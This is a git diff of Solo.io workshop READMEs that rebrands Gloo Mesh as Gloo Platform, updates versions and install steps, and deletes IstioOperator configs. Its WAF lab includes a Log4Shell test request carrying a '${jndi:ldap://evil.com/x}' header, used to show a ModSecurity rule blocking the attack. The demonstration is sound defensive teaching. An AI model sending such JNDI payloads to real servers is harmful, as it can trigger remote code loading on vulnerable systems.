diff --git a/workshops/gloo-gateway-day-2/README.md b/workshops/gloo-gateway-day-2/README.md index 1731a46..b516d02 100644 --- a/workshops/gloo-gateway-day-2/README.md +++ b/workshops/gloo-gateway-day-2/README.md @@ -90,7 +90,6 @@ helm upgrade --install gloo-platform-crds gloo-platform/gloo-platform-crds \ helm install gloo-platform gloo-platform/gloo-platform \ --version=$GLOO_PLATFORM_VERSION \ - --devel \ --namespace=gloo-mesh \ --set licensing.glooMeshLicenseKey=$GLOO_PLATFORM_LICENSE_KEY \ --set licensing.glooTrialLicenseKey=$GLOO_PLATFORM_LICENSE_KEY \ diff --git a/workshops/gloo-mesh-day-2/README.md b/workshops/gloo-mesh-day-2/README.md index 56db3f6..4af5364 100644 --- a/workshops/gloo-mesh-day-2/README.md +++ b/workshops/gloo-mesh-day-2/README.md @@ -45,10 +45,10 @@ Set these environment variables which will be used throughout the workshop. ```sh # Used to enable Gloo (please ask for a trial license key) export GLOO_PLATFORM_LICENSE_KEY= -export GLOO_PLATFORM_VERSION=v2.3.0-rc1 +export GLOO_PLATFORM_VERSION=v2.3.5 export ISTIO_IMAGE_REPO=us-docker.pkg.dev/gloo-mesh/istio-workshops -export ISTIO_IMAGE_TAG=1.16.3-solo -export ISTIO_VERSION=1.16.3 +export ISTIO_IMAGE_TAG=1.16.4-solo +export ISTIO_VERSION=1.16.4 export ISTIO_REVISION=1-16 ``` diff --git a/workshops/gloo-mesh-demo/README.md b/workshops/gloo-mesh-demo/README.md index ceb0fb1..afd6e47 100644 --- a/workshops/gloo-mesh-demo/README.md +++ b/workshops/gloo-mesh-demo/README.md @@ -1,42 +1,42 @@ -![Gloo Mesh Enterprise](images/gloo-mesh-2.0-banner.png) +![Gloo Platform](images/gloo-mesh-2.0-banner.png) -#
Gloo Mesh Online Boutique Demo Workshop
+#
Gloo Platform Online Boutique Demo Workshop
## Table of Contents * [Introduction](#introduction) * [Lab 1 - Deploy Kubernetes clusters](#Lab-1) -* [Lab 2 - Deploy Gloo Mesh](#Lab-2) +* [Lab 2 - Deploy Gloo Platform](#Lab-2) * [Lab 3 - Deploy Istio](#Lab-3) * [Lab 4 - Deploy Online Boutique Sample Application](#Lab-4) -* [Lab 5 - Configure Gloo Mesh Workspaces](#Lab-5) +* [Lab 5 - Configure Gloo Platform Workspaces](#Lab-5) * [Lab 6 - Expose the Online Boutique Frontend](#Lab-6) * [Lab 7 - Lock it down! Zero Trust Networking](#Lab-7) * [Lab 8 - Multi-cluster Routing](#Lab-8) * [Lab 9 - Multi-cluster Failover](#Lab-9) -* [Lab 10 - Gloo Mesh Gateway](#Lab-10) +* [Lab 10 - Gloo Gateway](#Lab-10) ## Introduction -[Gloo Mesh Enterprise](https://www.solo.io/products/gloo-mesh/) simplifies the adoption of a service mesh across single or many clusters. It is Enterprise [Istio](https://istio.io) with production support, N-4 support, CVE patching, FIPS builds, and a multi-cluster operational management plane to simplify running a service mesh across multiple clusters or a hybrid deployment. +[Gloo Platform](https://www.solo.io/products/gloo-mesh/) simplifies the adoption of a service mesh across single or many clusters. It is Enterprise [Istio](https://istio.io) with production support, N-4 support, CVE patching, FIPS builds, and a multi-cluster operational management plane to simplify running a service mesh across multiple clusters or a hybrid deployment. -Gloo Mesh also has features around multi-tenancy, global failover and routing, observability, and east-west rate limiting and policy enforcement (through AuthZ/AuthN plugins). +Gloo Platform also has features around multi-tenancy, global failover and routing, observability, and east-west rate limiting and policy enforcement (through AuthZ/AuthN plugins). 
-![Gloo Mesh Value](images/gloo-mesh-value.png) +![Gloo Platform Value](images/gloo-mesh-value.png) ### Dashboard & Observability -When you install Gloo Mesh Enterprise, you get the Gloo Mesh Dashboard which allows you to review the health and configuration of Gloo Mesh custom resources, including registered clusters, workspaces, networking, policies, and more. +When you install Gloo Platform, you get the Gloo Platform Dashboard which allows you to review the health and configuration of Gloo Platform custom resources, including registered clusters, workspaces, networking, policies, and more. -![Gloo Mesh graph](images/gloo-mesh-ui.png) +![Gloo Platform graph](images/gloo-mesh-ui.png) -Gloo Mesh uses agents to consolidate all the metrics and access logs from the different clusters. A Service Graph can then be used to monitor all the communication happening globally. +Gloo Platform uses agents to consolidate all the metrics and access logs from the different clusters. A Service Graph can then be used to monitor all the communication happening globally. -![Gloo Mesh graph](images/gloo-mesh-graph.png) +![Gloo Platform graph](images/gloo-mesh-graph.png) -### Want to learn more about Gloo Mesh? +### Want to learn more about Gloo Platform? -You can find more information about Gloo Mesh in the official documentation: +You can find more information about Gloo Platform in the official documentation: [https://docs.solo.io/gloo-mesh/latest/](https://docs.solo.io/gloo-mesh/latest/) 
@@ -52,14 +52,9 @@ cd solo-cop/workshops/gloo-mesh-demo Set these environment variables which will be used throughout the workshop. ```sh -# Used to enable Gloo Mesh (please ask for a trail license key) +# Used to enable Gloo Platform (please ask for a trail license key) export GLOO_MESH_LICENSE_KEY= -export GLOO_MESH_VERSION=v2.2.4 - -# Istio version information -export ISTIO_IMAGE_REPO=us-docker.pkg.dev/gloo-mesh/istio-workshops -export ISTIO_IMAGE_TAG=1.16.2-solo -export ISTIO_VERSION=1.16.2 +export GLOO_PLATFORM_VERSION=v2.3.1 ``` ## Lab 1 - Configure/Deploy the Kubernetes clusters 
@@ -88,13 +83,13 @@ kubectl config rename-context ${CLUSTER1} kubectl config rename-context ${CLUSTER2} ``` -## Lab 2 - Deploy Gloo Mesh +## Lab 2 - Deploy Gloo Platform ![Management Plane Architecture](images/gloo-mesh-mgmt-plane.png) -Gloo Mesh provides a management plane to interact with the clusters and services in your service mesh. The management plane exposes port `9900` via gRPC to connect to the Gloo Mesh agents that run in your remote workload clusters. With the management plane, you can easily set up multi-tenancy for your service mesh with workspaces, view the Gloo Mesh resources that you configured by using the Gloo Mesh UI, and collect service mesh metrics to verify the health of your service mesh and find bottlenecks. +Gloo Platform provides a management plane to interact with the clusters and services in your service mesh. The management plane exposes port `9900` via gRPC to connect to the Gloo Platform agents that run in your remote workload clusters. With the management plane, you can easily set up multi-tenancy for your service mesh with workspaces, view the Gloo Platform resources that you configured by using the Gloo Platform UI, and collect service mesh metrics to verify the health of your service mesh and find bottlenecks. -The `meshctl` command line utility provides convenient functions to quickly set up Gloo Mesh, register workload clusters, run sanity checks, and debug issues. Let's start by installing this utility. +The `meshctl` command line utility provides convenient functions to quickly set up Gloo Platform, register workload clusters, run sanity checks, and debug issues. Let's start by installing this utility. 1. Download `meshctl` command line tool and add it to your path 
@@ -104,33 +99,38 @@ curl -sL https://run.solo.io/meshctl/install | GLOO_MESH_VERSION=${GLOO_MESH_VER export PATH=$HOME/.gloo-mesh/bin:$PATH ``` -In this lab, you install Gloo Mesh in the management plane by using the `meshctl` command line utility. But you can also install it via Helm. Everything that is provided by Gloo Mesh is compatible with a GitOps approach. +In this lab, you install Gloo Platform in the management plane by using the `meshctl` command line utility. But you can also install it via Helm. Everything that is provided by Gloo Platform is compatible with a GitOps approach. -2. Run the following commands to deploy the Gloo Mesh management plane: +2. Run the following commands to deploy the Gloo Platform management plane: ```sh meshctl install \ --kubecontext $MGMT \ - --set mgmtClusterName=$MGMT \ - --license $GLOO_MESH_LICENSE_KEY + --license $GLOO_GATEWAY_LICENSE_KEY \ + --set common.cluster=$MGMT \ + --profiles mgmt-server ``` The management server exposes a grpc endpoint (`kubectl get svc gloo-mesh-mgmt-server -n gloo-mesh --context $MGMT`) which the agents in the workload clusters will connect to. -Use `meshctl` to install the Gloo Mesh agent in the service mesh clusters and register them with the Gloo Mesh management plane. When a cluster is registered with the management plane, the agent is configured with the token and certificate to securely connect to the Gloo Mesh management plane via mutual TLS (mTLS). +Use `meshctl` to install the Gloo Platform agent in the service mesh clusters and register them with the Gloo Platform management plane. When a cluster is registered with the management plane, the agent is configured with the token and certificate to securely connect to the Gloo Platform management plane via mutual TLS (mTLS). -3. Finally, you need to register the two other clusters by deploying the gloo mesh agents. +3. Finally, you need to register the two other clusters by deploying the gloo mesh agents. 
You will need to provide the telemetry gateway address for metrics to also be connected ```sh +GLOO_TELEMETRY_GATEWAY=$(kubectl get svc -n gloo-mesh gloo-telemetry-gateway --context $MGMT -o jsonpath='{.status.loadBalancer.ingress[0].*}'):$(kubectl --context ${MGMT} -n gloo-mesh get svc gloo-telemetry-gateway -o jsonpath='{.spec.ports[?(@.port==4317)].port}') + meshctl cluster register \ --kubecontext=$MGMT \ --remote-context=$CLUSTER1 \ + --telemetry-server-address $GLOO_TELEMETRY_GATEWAY \ $CLUSTER1 meshctl cluster register \ --kubecontext=$MGMT \ --remote-context=$CLUSTER2 \ + --telemetry-server-address $GLOO_TELEMETRY_GATEWAY \ $CLUSTER2 ``` 
@@ -143,22 +143,32 @@ meshctl check --kubecontext $MGMT You should see output similar to the following: ```sh -Checking Gloo Mesh Management Cluster Installation --------------------------------------------- +🟢 License status + + INFO gloo-gateway enterprise license expiration is..... + INFO Valid GraphQL license module found + +🟢 CRD version check + -🟢 Gloo Mgmt Server Deployment Status +🟢 Gloo Platform deployment status + +Namespace | Name | Ready | Status +gloo-mesh | gloo-mesh-redis | 1/1 | Healthy +gloo-mesh | gloo-mesh-mgmt-server | 1/1 | Healthy +gloo-mesh | gloo-telemetry-gateway | 1/1 | Healthy +gloo-mesh | prometheus-server | 1/1 | Healthy +gloo-mesh | gloo-mesh-ui | 1/1 | Healthy + +🟢 Mgmt server connectivity to workload agents + +Cluster | Registered | Connected Pod +cluster1 | true | gloo-mesh/gloo-mesh-mgmt-server-84bcc99f5-vbdjl +cluster2 | true | gloo-mesh/gloo-mesh-mgmt-server-84bcc99f5-vbdjl -🟢 Gloo Mgmt Server Connectivity to Agents -+----------+------------+--------------------------------------------------+ -| CLUSTER | REGISTERED | CONNECTED POD | -+----------+------------+--------------------------------------------------+ -| cluster1 | true | gloo-mesh/gloo-mesh-mgmt-server-6c697cb869-48vq7 | -+----------+------------+--------------------------------------------------+ -| cluster2 | true | gloo-mesh/gloo-mesh-mgmt-server-6c697cb869-48vq7 | -+----------+------------+--------------------------------------------------+ ``` -5. In addition, you can verify proper installation by opening the Gloo Mesh Dashboard. It's best to run this command in a separate terminal. +5. In addition, you can verify proper installation by opening the Gloo Platform Dashboard. It's best to run this command in a separate terminal. ```sh meshctl dashboard --kubecontext $MGMT 
@@ -166,27 +176,19 @@ meshctl dashboard --kubecontext $MGMT ## Lab 3 - Deploy Istio on the Workload Clusters +With a Gloo Platform-managed installation, you no longer need to use istioctl to individually install Istio in each workload cluster. Instead, you can supply IstioOperator configurations in a IstioLifecycleManager resource to your management cluster. Gloo Platform translates this resource into Istio control planes, gateways, and related resources in your registered workload clusters for you. -1. Download [istioctl](https://istio.io/latest/docs/setup/getting-started/) - -```sh -curl -L https://istio.io/downloadIstio | ISTIO_VERSION=${ISTIO_VERSION} sh - -export PATH=$PWD/istio-${ISTIO_VERSION}/bin:$PATH - -istioctl version -``` - -2. Install Istio to each of the remote clusters using Gloo Mesh IstioLifecycleManager and GatewayLifecycleManager. +1. Install Istio to each of the remote clusters using Gloo Platform IstioLifecycleManager and GatewayLifecycleManager. ```sh -kubectl apply -f install/istio/gm-istio.yaml --context $MGMT +kubectl apply -f install/istio/managed-istio.yaml --context $MGMT ``` -3. Verify in the Gloo Mesh Dashboard that the deployed Istio information was discovered. +2. Verify in the Gloo Platform Dashboard that the deployed Istio information was discovered. ![istio-installed](images/istio-installed.png) -4. Apply a RootTustPolicy to tell the management plane to handle setting up a [shared trust](https://docs.solo.io/gloo-mesh-enterprise/latest/setup/prod/certs/federate-identity/) between the two workload clusters. Gloo Mesh will create a common root certificate and issues an intermediate signing certificate authority (CA) to each of the remote clusters that contain a common root. +3. Apply a RootTustPolicy to tell the management plane to handle setting up a [shared trust](https://docs.solo.io/gloo-mesh-enterprise/latest/setup/prod/certs/federate-identity/) between the two workload clusters. 
Gloo Platform will create a common root certificate and issues an intermediate signing certificate authority (CA) to each of the remote clusters that contain a common root. ```yaml cat << EOF | kubectl --context ${MGMT} apply -f - @@ -203,7 +205,7 @@ spec: EOF ``` -Gloo Mesh can also integrate with various vendor technologies, including Vault, AWSCA, and more to ensure the CA meets your company's requirements. +Gloo Platform can also integrate with various vendor technologies, including Vault, AWSCA, and more to ensure the CA meets your company's requirements. ## Lab 4 - Deploy Online Boutique Sample Application 
@@ -212,25 +214,39 @@ Gloo Mesh can also integrate with various vendor technologies, including Vault, 1. Deploy the Online Boutique backend microservices to `cluster1` in the `backend-apis` namespace. ```sh -kubectl apply --context $CLUSTER1 -f install/online-boutique/backend-apis.yaml +kubectl create namespace backend-apis --context $CLUSTER1 +kubectl label ns backend-apis istio-injection=enabled --context $CLUSTER1 + +helm install backend-apis --version "5.0.0" oci://us-central1-docker.pkg.dev/solo-test-236622/solo-demos/onlineboutique \ + --create-namespace \ + --kube-context $CLUSTER1 \ + --namespace backend-apis \ + -f install/online-boutique/backend-apis-values.yaml ``` 2. Deploy the frontend microservice to the `web-ui` namespace in `cluster1`. ```sh -kubectl apply --context $CLUSTER1 -f install/online-boutique/web-ui.yaml +kubectl create namespace web-ui --context $CLUSTER1 +kubectl label ns web-ui istio-injection=enabled --context $CLUSTER1 + +helm install backend-apis --version "5.0.0" oci://us-central1-docker.pkg.dev/solo-test-236622/solo-demos/onlineboutique \ + --create-namespace \ + --kube-context $CLUSTER1 \ + --namespace web-ui \ + -f install/online-boutique/web-ui-values.yaml ``` -## Lab 5 - Configure Gloo Mesh Workspaces +## Lab 5 - Configure Gloo Platform Workspaces -In this lab, you'll learn about the Gloo Mesh **Workspaces** feature. Workspaces bring multi-tenancy controls to Istio. With workspaces, you can explore how multiple personas can work inside the service mesh independently without conflicting with each others configuration. +In this lab, you'll learn about the Gloo Platform **Workspaces** feature. Workspaces bring multi-tenancy controls to Istio. With workspaces, you can explore how multiple personas can work inside the service mesh independently without conflicting with each others configuration. -Imagine that you have the following teams. Each team represents a "tenant" in Gloo Mesh. +Imagine that you have the following teams. 
Each team represents a "tenant" in Gloo Platform. - The Ops team, who is responsible for the platform and ingress traffic. - The Web team, who is responsible for the frontend web application or client-facing services. - The Backend API team, who is responsible for backend services that power the frontend app. -All the workspaces are created by using the Gloo Mesh management plane. +All the workspaces are created by using the Gloo Platform management plane. ![online-boutique](images/online-boutique-workspaces.png) 
@@ -242,7 +258,7 @@ kubectl create namespace web-team --context $MGMT kubectl create namespace backend-apis-team --context $MGMT ``` -2. Apply the workspaces to the Gloo Mesh Management Plane root config namespace `gloo-mesh`. +2. Apply the workspaces to the Gloo Platform Management Plane root config namespace `gloo-mesh`. ```yaml kubectl --context ${MGMT} apply -f - < -In this lab, you learn how Gloo Mesh orchestrates failover with simple and declarative policy definitions that you apply to routes defined in your `RouteTables`. +In this lab, you learn how Gloo Platform orchestrates failover with simple and declarative policy definitions that you apply to routes defined in your `RouteTables`. ![Multicluster Failover](images/multicluster-failover-banner.png) 1. Deploy the frontend application to `cluster2` as well. ```sh -kubectl apply --context $CLUSTER2 -f install/online-boutique/web-ui-cluster2.yaml +kubectl create namespace web-ui --context $CLUSTER2 +kubectl label ns web-ui istio-injection=enabled --context $CLUSTER2 + +helm install ha-frontend --version "5.0.0" oci://us-central1-docker.pkg.dev/solo-test-236622/solo-demos/onlineboutique \ + --create-namespace \ + --kube-context $CLUSTER2 \ + --namespace web-ui \ + -f install/online-boutique/web-ui-cluster2-values.yaml ``` -In order to see the full power of Gloo Mesh failover policies, make sure that the frontend application is available on both clusters. To do so, create a `VirtualDestination` for frontend as well. +In order to see the full power of Gloo Platform failover policies, make sure that the frontend application is available on both clusters. To do so, create a `VirtualDestination` for frontend as well. 2. Create VirtualDestination for frontend application 
@@ -591,7 +621,7 @@ Review the following update to the `RouteTable` resource. You must configure the for i in {1..6}; do curl -sSk http://$GLOO_GATEWAY | grep "Cluster Name:"; done ``` -5. You can create a Gloo Mesh `FailoverPolicy` custom resource to configure locality-based load balancing across your virtual destinations. Apply this policy now. +5. You can create a Gloo Platform `FailoverPolicy` custom resource to configure locality-based load balancing across your virtual destinations. Apply this policy now. ```yaml kubectl --context ${MGMT} apply -f - < -Gloo Mesh Gateway adds API gateway features directly into the Istio ingress gateway. This way, you don't need an external API gateway or extra hops in your cluster to manage features like OIDC, WAF, rate limiting, and more. +Gloo Platform Gateway adds API gateway features directly into the Istio ingress gateway. This way, you don't need an external API gateway or extra hops in your cluster to manage features like OIDC, WAF, rate limiting, and more. -In this lab, you explore just a few of these features to see how powerful adding Gloo Mesh Gateway to your service mesh is. +In this lab, you explore just a few of these features to see how powerful adding Gloo Platform Gateway to your service mesh is. -In order to use the various features of the Gloo Mesh gateway you will need to deploy the `Gloo Mesh Addons` package which has the components to use features such as `rate limiting` and `external authorization`. +In order to use the various features of the Gloo Platform gateway you will need to deploy the `Gloo Platform Addons` package which has the components to use features such as `rate limiting` and `external authorization`. 1. 
Install the `gloo-mesh-addons` package in cluster1 ```sh -kubectl --context ${CLUSTER1} create namespace gloo-mesh-addons -kubectl --context ${CLUSTER1} label namespace gloo-mesh-addons istio-injection=enabled - -helm repo add gloo-mesh-agent https://storage.googleapis.com/gloo-mesh-enterprise/gloo-mesh-agent -helm repo update +kubectl --context $CLUSTER1 create namespace gloo-mesh-addons +kubectl --context $CLUSTER1 label namespace gloo-mesh-addons istio-injection=enabled -helm upgrade --install gloo-mesh-agent-addons gloo-mesh-agent/gloo-mesh-agent \ +helm upgrade --install gloo-platform-addons gloo-platform/gloo-platform \ --namespace gloo-mesh-addons \ - --kube-context=${CLUSTER1} \ - --set glooMeshAgent.enabled=false \ - --set rate-limiter.enabled=true \ - --set ext-auth-service.enabled=true \ - --version $GLOO_MESH_VERSION + --kube-context=$CLUSTER1 \ + --set common.cluster=$CLUSTER1 \ + --set rateLimiter.enabled=true \ + --set extAuthService.enabled=true \ + --version $GLOO_PLATFORM_VERSION kubectl apply -f tracks/06-api-gateway/gloo-mesh-addons-servers.yaml --context $MGMT ``` #### Web Application Firewall (WAF) -Gloo Mesh Gateway utilizes OWASP ModSecurity to add WAF features into the ingress gateway. Not only can you enable the [OWASP Core Rule Set](https://owasp.org/www-project-modsecurity-core-rule-set/) easily, but also you can enable many other advanced features to protect your applications. +Gloo Platform Gateway utilizes OWASP ModSecurity to add WAF features into the ingress gateway. Not only can you enable the [OWASP Core Rule Set](https://owasp.org/www-project-modsecurity-core-rule-set/) easily, but also you can enable many other advanced features to protect your applications. In this section of the lab, take a quick look at how to prevent the `log4j` exploit that was discovered in late 2021. For more details, you can review the [Gloo Edge blog](https://www.solo.io/blog/block-log4shell-attacks-with-gloo-edge/) that this implementation is based on. 
@@ -699,7 +726,7 @@ In this section of the lab, take a quick look at how to prevent the `log4j` expl curl -ikI -X GET -H "User-Agent: \${jndi:ldap://evil.com/x}" http://$GLOO_GATEWAY ``` -3. With the Gloo Mesh WAF policy custom resource, you can create reusable policies for ModSecurity. Review the `log4j` WAF policy and the frontend route table. Note the following settings. +3. With the Gloo Platform WAF policy custom resource, you can create reusable policies for ModSecurity. Review the `log4j` WAF policy and the frontend route table. Note the following settings. * In the route table, the frontend route has the label `virtual-destination: frontend`. The WAF policy applies to routes with this same label. * In the WAF policy config, the default core rule set is disabled. Instead, a custom rule set is created for the `log4j` attack. @@ -751,7 +778,7 @@ Your frontend app is no longer susceptible to `log4j` attacks, nice! #### External Authorization (OIDC) -Another valuable feature of API gateways is integration into your IdP (Identity Provider). In this section of the lab, we see how Gloo Mesh Gateway can be configured to redirect unauthenticated users via OIDC. We will use Keycloak as our IdP, but you could use other OIDC-compliant providers in your production clusters. +Another valuable feature of API gateways is integration into your IdP (Identity Provider). In this section of the lab, we see how Gloo Platform Gateway can be configured to redirect unauthenticated users via OIDC. We will use Keycloak as our IdP, but you could use other OIDC-compliant providers in your production clusters. 1. In order for OIDC to work we need to enable HTTPS on our gateway. For this demo, we will create and upload a self-signed certificate which will be used in the gateway for TLS termination. 
@@ -803,8 +830,8 @@ EOF 3. Test out the new HTTPS endpoint (you may need to allow insecure traffic in your browser. Chrome: Advanced -> Proceed) ```sh -export GLOO_GATEWAY=$(kubectl --context ${CLUSTER1} -n istio-ingress get svc istio-ingressgateway -o jsonpath='{.status.loadBalancer.ingress[0].*}'):443 -echo "Secure Online Boutique URL: https://$GLOO_GATEWAY" +export GLOO_GATEWAY_HTTPS=$(kubectl --context ${CLUSTER1} -n istio-ingress get svc istio-ingressgateway -o jsonpath='{.status.loadBalancer.ingress[0].*}'):443 +echo "Secure Online Boutique URL: https://$GLOO_GATEWAY_HTTPS" ``` 4. Finally, we need to deploy our OIDC server keycloak. We provided you with a script to deploy and configure keycloak for our workshop. @@ -856,7 +883,7 @@ And the application is now accessible. ### 3. Add Rate Limiting -Secondly, we will look at rate limiting with Gloo Mesh Gateway. The rate limiting feature relies on a rate limit server that has been installed in our gloo-mesh-addons namespace. +Secondly, we will look at rate limiting with Gloo Platform Gateway. The rate limiting feature relies on a rate limit server that has been installed in our gloo-mesh-addons namespace. For rate limiting, we need to create three CRs. Let's start with the `RateLimitClientConfig`. @@ -938,7 +965,7 @@ kubectl --context ${MGMT} delete ExtAuthPolicy frontend -n web-team * Test Rate Limiting ```sh -for i in {1..6}; do curl -iksS -X GET https://$GLOO_GATEWAY | tail -n 10; done +for i in {1..6}; do curl -iksS -X GET https://$GLOO_GATEWAY_HTTPS | tail -n 10; done ``` * Expected Response - If you try the Online Boutique UI you will see a blank page because the rate-limit response is in the headers diff --git a/workshops/gloo-mesh-demo/install/istio/istiooperator-cluster1.yaml b/workshops/gloo-mesh-demo/install/istio/istiooperator-cluster1.yaml deleted file mode 100755 index 00ac141..0000000 --- a/workshops/gloo-mesh-demo/install/istio/istiooperator-cluster1.yaml +++ /dev/null 
@@ -1,99 +0,0 @@ -apiVersion: install.istio.io/v1alpha1 -kind: IstioOperator -metadata: - name: gloo-mesh-istio - namespace: istio-system -spec: - # Start with just the basic control plane, customize and add gateways - profile: minimal - - meshConfig: - # enable access logging to standard output - accessLogFile: /dev/stdout - - defaultConfig: - # wait for the istio-proxy to start before application pods - holdApplicationUntilProxyStarts: true - # enable Gloo Mesh metrics service (required for Gloo Mesh UI) - envoyMetricsService: - address: gloo-mesh-agent.gloo-mesh:9977 - # enable GlooMesh accesslog service (required for Gloo Mesh Access Logging) - envoyAccessLogService: - address: gloo-mesh-agent.gloo-mesh:9977 - proxyMetadata: - # Enable Istio agent to handle DNS requests for known hosts - # Unknown hosts will automatically be resolved using upstream dns servers in resolv.conf - # (for proxy-dns) - ISTIO_META_DNS_CAPTURE: "true" - # Enable automatic address allocation (for proxy-dns) - ISTIO_META_DNS_AUTO_ALLOCATE: "true" - # Used for gloo mesh metrics aggregation - # should match trustDomain (required for Gloo Mesh UI) - GLOO_MESH_CLUSTER_NAME: cluster1 - # Specify if http1.1 connections should be upgraded to http2 by default. - # Can be overridden using DestinationRule - h2UpgradePolicy: UPGRADE - - # The trust domain corresponds to the trust root of a system. 
- # For Gloo Mesh this should be the name of the cluster that cooresponds with the CA certificate CommonName identity - trustDomain: cluster1.solo.io - components: - ingressGateways: - # enable the default ingress gateway - - name: istio-ingressgateway - namespace: istio-ingress - enabled: true - k8s: - service: - type: LoadBalancer - ports: - # main http ingress port - - port: 80 - targetPort: 8080 - name: http2 - # main https ingress port - - port: 443 - targetPort: 8443 - name: https - - name: istio-eastwestgateway - enabled: true - namespace: istio-eastwest - label: - istio: eastwestgateway - k8s: - env: - # Required by Gloo Mesh for east/west routing - - name: ISTIO_META_ROUTER_MODE - value: "sni-dnat" - service: - type: LoadBalancer - selector: - istio: eastwestgateway - # Default ports - ports: - # Port for multicluster mTLS passthrough; required for Gloo Mesh east/west routing - - port: 15443 - targetPort: 15443 - # Gloo Mesh looks for this default name 'tls' on a gateway - name: tls - pilot: - k8s: - env: - # Allow multiple trust domains (Required for Gloo Mesh east/west routing) - - name: PILOT_SKIP_VALIDATE_TRUST_DOMAIN - value: "true" - # disable associating workload entries with kube services - - name: PILOT_ENABLE_K8S_SELECT_WORKLOAD_ENTRIES - value: "false" - values: - gateways: - istio-ingressgateway: - # Enable gateway injection - injectionTemplate: gateway - # https://istio.io/v1.5/docs/reference/config/installation-options/#global-options - global: - # needed for connecting VirtualMachines to the mesh - network: cluster1 - # needed for annotating istio metrics with cluster (should match trust domain and GLOO_MESH_CLUSTER_NAME) - multiCluster: - clusterName: cluster1 diff --git a/workshops/gloo-mesh-demo/install/istio/istiooperator-cluster2.yaml b/workshops/gloo-mesh-demo/install/istio/istiooperator-cluster2.yaml deleted file mode 100755 index 7ddf7d6..0000000 --- a/workshops/gloo-mesh-demo/install/istio/istiooperator-cluster2.yaml +++ /dev/null 
@@ -1,99 +0,0 @@ -apiVersion: install.istio.io/v1alpha1 -kind: IstioOperator -metadata: - name: gloo-mesh-istio - namespace: istio-system -spec: - # Start with just the basic control plane, customize and add gateways - profile: minimal - - meshConfig: - # enable access logging to standard output - accessLogFile: /dev/stdout - - defaultConfig: - # wait for the istio-proxy to start before application pods - holdApplicationUntilProxyStarts: true - # enable Gloo Mesh metrics service (required for Gloo Mesh UI) - envoyMetricsService: - address: gloo-mesh-agent.gloo-mesh:9977 - # enable GlooMesh accesslog service (required for Gloo Mesh Access Logging) - envoyAccessLogService: - address: gloo-mesh-agent.gloo-mesh:9977 - proxyMetadata: - # Enable Istio agent to handle DNS requests for known hosts - # Unknown hosts will automatically be resolved using upstream dns servers in resolv.conf - # (for proxy-dns) - ISTIO_META_DNS_CAPTURE: "true" - # Enable automatic address allocation (for proxy-dns) - ISTIO_META_DNS_AUTO_ALLOCATE: "true" - # Used for gloo mesh metrics aggregation - # should match trustDomain (required for Gloo Mesh UI) - GLOO_MESH_CLUSTER_NAME: cluster2 - # Specify if http1.1 connections should be upgraded to http2 by default. - # Can be overridden using DestinationRule - h2UpgradePolicy: UPGRADE - - # The trust domain corresponds to the trust root of a system. 
- # For Gloo Mesh this should be the name of the cluster that cooresponds with the CA certificate CommonName identity - trustDomain: cluster2.solo.io - components: - ingressGateways: - # enable the default ingress gateway - - name: istio-ingressgateway - namespace: istio-ingress - enabled: true - k8s: - service: - type: LoadBalancer - ports: - # main http ingress port - - port: 80 - targetPort: 8080 - name: http2 - # main https ingress port - - port: 443 - targetPort: 8443 - name: https - - name: istio-eastwestgateway - enabled: true - namespace: istio-eastwest - label: - istio: eastwestgateway - k8s: - env: - # Required by Gloo Mesh for east/west routing - - name: ISTIO_META_ROUTER_MODE - value: "sni-dnat" - service: - type: LoadBalancer - selector: - istio: eastwestgateway - # Default ports - ports: - # Port for multicluster mTLS passthrough; required for Gloo Mesh east/west routing - - port: 15443 - targetPort: 15443 - # Gloo Mesh looks for this default name 'tls' on a gateway - name: tls - pilot: - k8s: - env: - # Allow multiple trust domains (Required for Gloo Mesh east/west routing) - - name: PILOT_SKIP_VALIDATE_TRUST_DOMAIN - value: "true" - # disable associating workload entries with kube services - - name: PILOT_ENABLE_K8S_SELECT_WORKLOAD_ENTRIES - value: "false" - values: - gateways: - istio-ingressgateway: - # Enable gateway injection - injectionTemplate: gateway - # https://istio.io/v1.5/docs/reference/config/installation-options/#global-options - global: - # needed for connecting VirtualMachines to the mesh - network: cluster2 - # needed for annotating istio metrics with cluster (should match trust domain and GLOO_MESH_CLUSTER_NAME) - multiCluster: - clusterName: cluster2 diff --git a/workshops/gloo-mesh-demo/install/istio/istiooperator-mgmt.yaml b/workshops/gloo-mesh-demo/install/istio/istiooperator-mgmt.yaml deleted file mode 100755 index 82927f2..0000000 --- a/workshops/gloo-mesh-demo/install/istio/istiooperator-mgmt.yaml +++ /dev/null 
@@ -1,38 +0,0 @@ -apiVersion: install.istio.io/v1alpha1 -kind: IstioOperator -metadata: - name: gloo-mesh-mgmt-istio - namespace: istio-system -spec: - # only the control plane components are installed (https://istio.io/latest/docs/setup/additional-setup/config-profiles/) - profile: minimal - - meshConfig: - # enable access logging to standard output - accessLogFile: /dev/stdout - - defaultConfig: - # wait for the istio-proxy to start before application pods - holdApplicationUntilProxyStarts: true - # Specify if http1.1 connections should be upgraded to http2 by default. - # Can be overridden using DestinationRule - h2UpgradePolicy: UPGRADE - components: - ingressGateways: - # enable the default ingress gateway - - name: istio-ingressgateway - namespace: istio-system - enabled: true - k8s: - service: - type: LoadBalancer - ports: - # gloo mesh dashboard - - name: http-gm-dashboard - port: 8091 - targetPort: 8091 - values: - gateways: - istio-ingressgateway: - # Enable gateway injection - injectionTemplate: gateway \ No newline at end of file diff --git a/workshops/gloo-mesh-demo/install/istio/gm-istio.yaml b/workshops/gloo-mesh-demo/install/istio/managed-istio.yaml similarity index 99% rename from workshops/gloo-mesh-demo/install/istio/gm-istio.yaml rename to workshops/gloo-mesh-demo/install/istio/managed-istio.yaml index 0dfbd7e..6701b4a 100644 --- a/workshops/gloo-mesh-demo/install/istio/gm-istio.yaml +++ b/workshops/gloo-mesh-demo/install/istio/managed-istio.yaml @@ -22,7 +22,7 @@ spec: # You get the repo key from your Solo Account Representative. hub: us-docker.pkg.dev/gloo-mesh/istio-workshops # Any Solo.io Gloo Istio tag - tag: 1.16.2-solo + tag: 1.16.4-solo namespace: istio-system # Mesh configuration meshConfig: @@ -89,7 +89,7 @@ spec: # You get the repo key from your Solo Account Representative. hub: us-docker.pkg.dev/gloo-mesh/istio-workshops # The Solo.io Gloo Istio tag - tag: 1.16.2-solo + tag: 1.16.4-solo components: ingressGateways: - enabled: true 
